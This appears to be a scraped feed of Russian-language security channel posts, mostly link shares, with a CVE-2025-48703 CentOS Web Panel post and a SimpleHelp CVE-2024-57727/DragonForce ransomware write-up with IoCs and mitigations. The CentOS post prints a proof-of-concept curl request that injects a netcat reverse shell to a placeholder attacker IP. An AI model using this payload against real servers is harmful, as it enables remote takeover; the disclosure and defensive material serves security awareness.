Fsecurity | HH

Discord сервер 👆🏻Тут можно пообщаться и найти много полезной информации 🦈

🔗Ссылка: https://habr.com/ru/companies/sberbank/articles/923946/

🔗Ссылка: https://opennet.ru/63532/

🛡 CVE-2025-48703 - RCE in CentOS Web Panel File Manager module RCE уязвимость приложения для управления серверами CentOS Web Panel Проблема в функции acc=changePerm, где не производится должная проверка входных данных, что позволяет выполнить произвольный код в параметре t_total

❗️ Эту атаку можно выполнить с минимальной аутентификацией или в некоторых конфигурациях, с не аутентифицированным доступом.

🔗 Research PoC:

curl -kis 'https://<TARGET_IP>:2083/myuser/index.php?module=filemanager&acc=changePerm' \
  --data 'fileName=.bashrc&currentPath=/home/myuser&t_total=`nc <ATTACKER_IP> 4444 -e /bin/bash`'

💻 Scanner #cve #poc #centoswebpanel #web ✈️ Whitehat Lab 💬Chat

SimpleHelp RMM CVE-2024-57727 SimpleHelp — это популярная система удаленного мониторинга и управления (RMM), которую используют IT-провайдеры и системные администраторы для управления клиентскими сетями. Система позволяет удаленно подключаться к компьютерам, устанавливать обновления, мониторить состояние систем и решать проблемы без физического присутствия. RMM-системы критически важны для современного IT-аутсорсинга — через них управляются тысячи endpoint'ов в корпоративных сетях. Именно поэтому компрометация RMM равносильна получению "мастер-ключа" ко всей IT-инфраструктуре клиента. Трипл килл: CVE-2024-57726, CVE-2024-57727, CVE-2024-57728 В январе 2025 года были раскрыты сразу три критические уязвимости в SimpleHelp: ➡️CVE-2024-57726 — дополнительная уязвимость безопасности ➡️CVE-2024-57727 — path traversal уязвимость (основная) ➡️CVE-2024-57728 — еще одна критическая брешь CVE-2024-57727 представляет собой path traversal уязвимость в SimpleHelp версий 5.5.7 и ранее. Path traversal позволяет атакующему "выйти" за пределы разрешенной директории, используя последовательности типа `../` для доступа к произвольным файлам системы. ❗️DragonForce Главным эксплуататором этих уязвимостей стала группа DragonForce — не просто ransomware группировка, а целая "картельная модель" с франшизой для аффилиатов. Группа активно перестраивает ландшафт угроз после падения LockBit. 📌Связи DragonForce: ➡️Поглощение/взлом сайтов BlackLock, Mamona, RansomHub ➡️Подозрения в сотрудничестве с Scattered Spider ➡️Использование advanced техник социальной инженерии 💻Анатомия атаки на MSP DragonForce провела sophisticated атаку на британского MSP-провайдера, используя следующую схему: ➡️Этап 1: Компрометация RMM - Эксплуатация CVE-2024-57727 для получения доступа к SimpleHelp-серверу MSP - Получение контроля над RMM-инфраструктурой ➡️Этап 2: Разведка и закрепление - Пуш SimpleHelp-инсталлятора клиентам через легитимную RMM-инфраструктуру - Сканирование инфраструктур клиентов: имена устройств, пользователей, сетевые соединения - Использование Microsoft Quick Assist и бэкдора QDoor для бесшумного закрепления - Пребывание в сети до 9 дней до активации шифровальщика ➡️Этап 3: Атака - Развертывание шифровальщика и инструментов двойного вымогательства - Использование визинга + email-бомбинга для дополнительного давления - Массовые сбои и отключения IT в ритейле Великобритании ❗️Индикаторы компрометации (мини IoC) CISA и исследователи выделяют следующие IoC: ➡️Исполняемые файлы с трехбуквенными именами (aaa.exe, bbb.exe, ccc.exe) ➡️Время создания файлов после января 2025 года ➡️Аномальный сетевой трафик от SimpleHelp сервера ➡️Присутствие Microsoft Quick Assist в неожиданных местах ➡️Следы QDoor бэкдора в системе 🔖Рекомендации по защите 0️⃣Обновление до версии 5.5.8+ — критически важно для всех инсталляций 1️⃣Изоляция SimpleHelp серверов от интернета до применения патча 2️⃣Аудит всех трех CVE (57726, 57727, 57728) в системе 3️⃣Проверка на QDoor и Quick Assist в неожиданных местах ❗️Для MSP и IT-провайдеров: ➡️Немедленный аудит всех клиентских подключений через SimpleHelp ➡️Проверка логов на подозрительную активность с января 2025 ➡️Уведомление клиентов о необходимости threat hunting ➡️Временное отключение RMM-доступа до полной проверки 🕰Проверка компрометации: ➡️Поиск файлов с трехбуквенными именами, созданных после января 2025 ➡️Анализ сетевого трафика на аномалии ➡️Проверка наличия Microsoft Quick Assist в системах, где он не должен быть ➡️Поиск следов QDoor бэкдора Долгосрочные меры: ➡️Внедрение Zero Trust архитектуры для RMM-систем ➡️Сегментация сети между RMM и критическими системами ➡️Мониторинг всех RMM-подключений в реальном времени ➡️Создание incident response плана для RMM-компрометации 💬Выводы CVE-2024-57727 и связанные уязвимости показывают, что в эпоху cloud-first и remote-first подходов, безопасность управляющих систем должна быть приоритетом номер один.

🖥 Play with Docker В поисках полезной информации нашел интересные площадки для DevOps Это полностью бесплатные интерактивные платформы для тестирования и обучения 🖼️ Docker и 🖼️ Kubernetes Есть теория и различные практические задания 🔗 Play with Docker 🔗 Play with Kubernetes ✍️ Training Docker ✍️ Training Kubernetes 💻 Repo #docker #kubernetes #devops ✈️ Whitehat Lab 💬Chat

🔗Ссылка: https://opennet.ru/63531/

🔗Ссылка: https://opennet.ru/63530/

🔗Ссылка: https://unit42.paloaltonetworks.com/apache-cve-2025-24813-cve-2025-27636-cve-2025-29891/

Discord сервер 👆🏻Тут можно пообщаться и найти много полезной информации 🦈

🔗Ссылка: https://opennet.ru/63527/

🔗Ссылка: https://mrd0x.com/filefix-part-2/

🔗Ссылка: https://www.securitylab.ru/news/561038.php?r=1

🔗Ссылка: https://m.youtube.com/watch?v=7Wo_y1pk3Sw

Добавить менеджер учетных данных меня просили много знакомых, и вот наконец, он появится в версии 0.7.

Когда просишь пофиксить уязвимости

Discord сервер 👆🏻Тут можно пообщаться и найти много полезной информации 🦈

🔗Ссылка: https://www.yeswehack.com/learn-bug-bounty/recon-hackers-guide-google-dorking

🔗Ссылка: https://habr.com/ru/news/924560/

🔗Ссылка: https://xakep.ru/2025/02/18/fortios-bypass/